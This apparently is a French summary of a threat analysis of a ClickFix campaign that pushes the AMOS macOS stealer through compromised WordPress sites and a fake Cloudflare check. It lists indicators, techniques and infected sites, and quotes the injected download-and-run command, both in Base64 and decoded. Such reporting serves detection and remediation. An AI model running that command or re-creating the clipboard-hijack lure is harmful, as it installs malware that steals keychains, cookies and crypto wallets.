Selon une analyse de Neil Lofland publiée le 2 mars 2026, une campagne mondiale de distribution de malware abuse de la confiance des utilisateurs via des sites WordPress compromis et une imitation de vérification Cloudflare afin d’installer AMOS (Atomic macOS Stealer) sur macOS.

• L’attaque s’appuie sur un Traffic Delivery System (TDS) ultra-sélectif qui masque l’injection aux scanners, VPN, datacenters et outils d’analyse. L’accès malveillant est servi uniquement aux visiteurs “grand public” (IP résidentielles, empreintes navigateur cohérentes), rendant la compromission quasi invisible aux contrôles automatisés.

• Chaîne d’attaque: compromission du backend WordPress (probablement via plugin vulnérable ou identifiants volés) et injection d’un loader dans la base via des plugins de scripts “Header/Footer”. Ensuite, un leurre d’ingénierie sociale affiche un faux modal Cloudflare “Verify you are human” (polices, couleurs, Ray ID factice), incitant l’utilisateur à copier-coller un texte dans Terminal. Le bouton “Copy” effectue un clipboard hijack (navigator.clipboard.writeText) pour remplacer le contenu par une commande Base64 qui exécute un curl|bash en tâche de fond via nohup (attaque fileless).

• Charge utile: la commande télécharge un script depuis volcatomix.com qui déploie AMOS/Atomic macOS Stealer. Le stealer crée /tmp/stravy/, collecte les trousseaux macOS, identifiants/cookies navigateurs, portefeuilles crypto (extensions incluses), données d’autoremplissage et jetons de session, puis archive en /tmp/alego.zip et exfiltre vers un C2 (stradisamplix.com, 86.54.42.244) avec un en-tête d’affiliation X-Bid pour le suivi MaaS.

• Échelle de la campagne: au moins 6 sites compromis confirmés sur 9 testés en 96 heures, dont un service d’annotation web (Hypothesis), une organisation United Way, un e-commerçant de spas, un éditeur de jeux pour enfants, un détaillant et une marque alimentaire espagnole, tous chargeant le même loader aloparatoriuz.com.

• L’auteur fournit des preuves techniques (snippets de loader, logique de vérification, Base64 décodé) et des IoCs détaillés. Le papier insiste sur la force de l’attaque: la superposition de la confiance (site de renom → modal Cloudflare crédible → geste “sécuritaire” attendu) plutôt que sur une sophistication technique inédite.

IoCs (extraits):

  • Domaines/URL: api.aloparatoriuz.com, volcatomix.com (incl. /cl/index.php), stradisamplix.com
  • IP: 86.54.42.244
  • Chaînes/artefacts: Base64 loader “aHR0cHM6Ly9hcGkuYWxvcGFyYXRvcml1ei5jb20vTG9rd2lVSGhhamhXbmJY”; en-tête HTTP “X-Bid: f48fbe39836779cadbf148b5952919fd”; chemins “/tmp/stravy/” et “/tmp/alego.zip”
  • Commande injectée (obfusquée pour sûreté): “echo "Y3VybCAtcyBodHRwOi8vdm9sY2F0b21peC5jb20vY2wvaW5kZXgucGhwIHwgbm9odXAgYmFzaCAm" | base64 -d | b a s h” → “curl -s http://volcatomix.com/cl/index.php | nohup b a s h &”

TTPs observés:

  • Cloaking TDS avec fingerprinting IP/UA/langue/taille écran
  • Injection WordPress côté base via plugins de scripts (pas de modification de fichiers thèmes)
  • Redondance loader (clair + Base64) pour contourner WAF à mots-clés
  • Usurpation Cloudflare (modal factice, Ray ID) et ingénierie sociale “ClickFix”
  • Clipboard hijack JavaScript (navigator.clipboard.writeText)
  • Obfuscation Base64 et curl|bash avec nohup en arrière-plan (exécution fileless)
  • Vol d’informations (trousseau, navigateurs, crypto, autofill, tokens) et exfiltration C2 avec identifiant d’affilié MaaS

Sites confirmés infectés (27 fév. 2026):

  • web.hypothes.is
  • unitedwaynca.org
  • hottub.com
  • outrightgames.com
  • aqualivingstores.com
  • recetaslamasia.es

Conclusion: il s’agit d’une analyse de menace technique visant à exposer la chaîne d’attaque, les IoCs, l’ampleur de la campagne et les mécanismes d’évasion pour favoriser la détection et les remédiations.

🧠 TTPs et IOCs détectés

TTP

[‘Cloaking TDS avec fingerprinting IP/UA/langue/taille écran’, ‘Injection WordPress côté base via plugins de scripts’, ‘Redondance loader (clair + Base64) pour contourner WAF à mots-clés’, ‘Usurpation Cloudflare (modal factice, Ray ID) et ingénierie sociale’, ‘Clipboard hijack JavaScript (navigator.clipboard.writeText)’, ‘Obfuscation Base64 et curl|bash avec nohup en arrière-plan (exécution fileless)’, ‘Vol d’informations (trousseau, navigateurs, crypto, autofill, tokens)’, ‘Exfiltration C2 avec identifiant d’affilié MaaS’]

IOC

{‘domain’: [‘api.aloparatoriuz.com’, ‘volcatomix.com’, ‘stradisamplix.com’], ‘ip’: [‘86.54.42.244’], ‘base64_loader’: [‘aHR0cHM6Ly9hcGkuYWxvcGFyYXRvcml1ei5jb20vTG9rd2lVSGhhamhXbmJY’], ‘http_header’: [‘X-Bid: f48fbe39836779cadbf148b5952919fd’], ‘paths’: [’/tmp/stravy/’, ‘/tmp/alego.zip’], ‘command’: [’echo “Y3VybCAtcyBodHRwOi8vdm9sY2F0b21peC5jb20vY2wvaW5kZXgucGhwIHwgbm9odXAgYmFzaCAm” | base64 -d | b a s h’]}

🔗 Source originale : https://defensendepth.substack.com/p/the-ghost-in-the-annotations